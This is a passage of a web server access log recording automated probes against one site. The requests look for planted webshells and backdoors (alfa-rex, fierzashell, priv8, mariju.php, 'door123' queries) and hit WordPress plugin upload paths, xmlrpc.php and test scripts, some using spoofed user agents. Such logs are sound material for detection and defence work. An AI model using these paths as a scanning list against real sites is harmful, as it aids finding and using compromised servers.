/ii.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:12 -0400] "GET /jj.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:13 -0400] "GET /hh.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:13 -0400] "GET /ll.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:13 -0400] "GET /mm.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:13 -0400] "GET /nn.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:14 -0400] "GET /oo.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:14 -0400] "GET /qq.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:14 -0400] "GET /pp.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:15 -0400] "GET /rr.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:15 -0400] "GET /ss.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:15 -0400] "GET /tt.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:16 -0400] "GET /uu.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:16 -0400] "GET /ww.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:16 -0400] "GET /xx.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:16 -0400] "GET /yy.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:17 -0400] "GET /zz.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:17 -0400] "GET /b1.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:17 -0400] "GET /b2.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:18 -0400] "GET /b3.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:18 -0400] "GET /b4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:18 -0400] "GET /b5.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:19 -0400] "GET /b6.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:19 -0400] "GET /b7.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:19 -0400] "GET /b8.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:19 -0400] "GET /b9.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:20 -0400] "GET /b10.php HTTP/1.1" 301 238 "-" "-" 94.16.113.252 - - [12/Aug/2025:17:23:20 -0400] "GET /wp-content/plugins/background-image-cropper/ups.php HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 4.197.236.174 - - [12/Aug/2025:17:23:20 -0400] "GET /c1.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:20 -0400] "GET /c2.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:21 -0400] "GET /c3.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:21 -0400] "GET /c4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:22 -0400] "GET /c5.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:22 -0400] "GET /c6.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:22 -0400] "GET /c7.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:23 -0400] "GET /c8.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:23 -0400] "GET /c9.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:23 -0400] "GET /c10.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:23 -0400] "GET /v1.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:24 -0400] "GET /v2.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:24 -0400] "GET /v3.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:24 -0400] "GET /v4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:25 -0400] "GET /v5.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:25 -0400] "GET /v6.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:25 -0400] "GET /v7.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:26 -0400] "GET /v8.pp HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:26 -0400] "GET /v9.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:26 -0400] "GET /v10.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:26 -0400] "GET /f1.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:27 -0400] "GET /f2.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:27 -0400] "GET /f3.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:27 -0400] "GET /f4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:28 -0400] "GET /f5.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:28 -0400] "GET /f6.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:29 -0400] "GET /f7.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:29 -0400] "GET /f8.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:29 -0400] "GET /f9.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:30 -0400] "GET /f10.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:30 -0400] "GET /a1.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:30 -0400] "GET /a2.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:31 -0400] "GET /a3.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:31 -0400] "GET /a4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:31 -0400] "GET /a5.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:31 -0400] "GET /a6.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:32 -0400] "GET /a7.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:32 -0400] "GET /a8.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:32 -0400] "GET /a9.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:33 -0400] "GET /a10.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:33 -0400] "GET /news.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:33 -0400] "GET /jobs.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:34 -0400] "GET /updates.php HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:34 -0400] "GET /schemes.php HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:34 -0400] "GET /contact.php HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:34 -0400] "GET /goods.php HTTP/1.1" 301 240 "-" "-" 94.16.113.252 - - [12/Aug/2025:17:23:58 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:24:59 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:26:00 -0400] "POST /xmlrpc.php HTTP/1.1" 301 245 "-" "python-requests/2.32.4" 94.16.113.252 - - [12/Aug/2025:17:26:14 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:26:51 -0400] "GET //wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:26:54 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:26:55 -0400] "GET /wp-admin/css/colors/coffee/mariju.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:26:55 -0400] "GET //wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:17:27:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:17:27:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:17:27:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:17:27:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:17:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:17:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:17:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:17:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:27:22 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:27:32 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:28:04 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:28:17 -0400] "GET /wp-post-editor.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:28:34 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:29:01 -0400] "GET /users.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:29:22 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:17:30:07 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:17:30:07 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:17:30:07 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:17:30:07 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:17:30:13 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:30:13 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:30:29 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:30:33 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:30:38 -0400] "GET /cgi-bin/mariju.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:17:30:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:17:30:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:17:30:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:17:30:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:30:58 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:31:03 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:31:14 -0400] "GET /wp-header.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:31:23 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:31:41 -0400] "GET /.well-known/ HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:32:05 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:32:08 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:32:16 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:32:50 -0400] "GET /options.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:32:55 -0400] "GET /.well-known/admin.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:01 -0400] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.30300.169 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:03 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:21 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:23 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:24 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:32 -0400] "GET /wp-admin/options.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:41 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:33:51 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:34:32 -0400] "GET /repeater.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:35:48 -0400] "GET /wp-includes/IXR/mariju.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:17:35:49 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:17:35:49 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:17:35:49 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:17:35:49 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:35:59 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:36:29 -0400] "GET /.well-known/fierzashell.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:36:55 -0400] "GET /defaults.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 94.16.113.252 - - [12/Aug/2025:17:37:45 -0400] "GET /b0.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:37:55 -0400] "GET //alfa-rex.php7 HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:40:11 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:41:15 -0400] "GET /wp-content/plugins/work-list/lang.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:42:25 -0400] "GET /top.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:17:43:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) 